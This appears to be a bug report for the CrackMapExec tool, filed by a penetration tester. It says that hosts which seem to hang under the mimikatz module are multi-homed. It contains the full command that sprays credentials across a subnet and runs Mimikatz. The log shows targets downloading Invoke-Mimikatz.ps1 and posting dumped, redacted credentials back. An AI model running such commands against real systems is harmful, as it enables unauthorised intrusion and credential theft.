bughelp wanted
説明
Not sure if this is even worth addressing, but I just noticed on an engagement today that many of the hosts that never finish are in fact finishing, but are multi-homed. Here is example output from a system that I RDP'ed into to verify that all IPs were assigned to the same host:
cme smb 1.2.3.0/24 -u someuser -p 'somepassword' -M mimikatz
SMB 1.2.3.200 445 DOMAIN [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB 1.2.3.200 445 DOMAIN [+] DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 445 DOMAIN [+] Executed launcher
MIMIKATZ 1.2.3.200 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ 1.2.3.200 [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 (null)\USER:PASSWORD
MIMIKATZ 1.2.3.200 [+] Added 6 credential(s) to the database
MIMIKATZ 1.2.3.200 [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_222944.log
SMB 1.2.3.205 445 DOMAIN [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB 1.2.3.202 445 DOMAIN [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB 1.2.3.210 445 DOMAIN [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB 1.2.3.205 445 DOMAIN [+] DOMAIN:USER:PASSWORD
SMB 1.2.3.202 445 DOMAIN [+] DOMAIN:USER:PASSWORD
SMB 1.2.3.210 445 DOMAIN [+] DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.205 445 DOMAIN [+] Executed launcher
MIMIKATZ 1.2.3.210 445 DOMAIN [+] Executed launcher
MIMIKATZ 1.2.3.202 445 DOMAIN [+] Executed launcher
MIMIKATZ 1.2.3.200 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ 1.2.3.200 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ 1.2.3.200 [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 (null)\USER:PASSWORD
MIMIKATZ 1.2.3.200 [+] Added 6 credential(s) to the database
MIMIKATZ 1.2.3.200 [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223044.log
MIMIKATZ 1.2.3.200 [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 (null)\USER:PASSWORD
MIMIKATZ 1.2.3.200 [+] Added 6 credential(s) to the database
MIMIKATZ 1.2.3.200 [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223045.log
MIMIKATZ 1.2.3.200 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ 1.2.3.200 [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 DOMAIN:USER:PASSWORD
MIMIKATZ 1.2.3.200 (null)\USER:PASSWORD
MIMIKATZ 1.2.3.200 [+] Added 6 credential(s) to the database
MIMIKATZ 1.2.3.200 [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223052.log
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)
MIMIKATZ [*] Waiting on 3 host(s)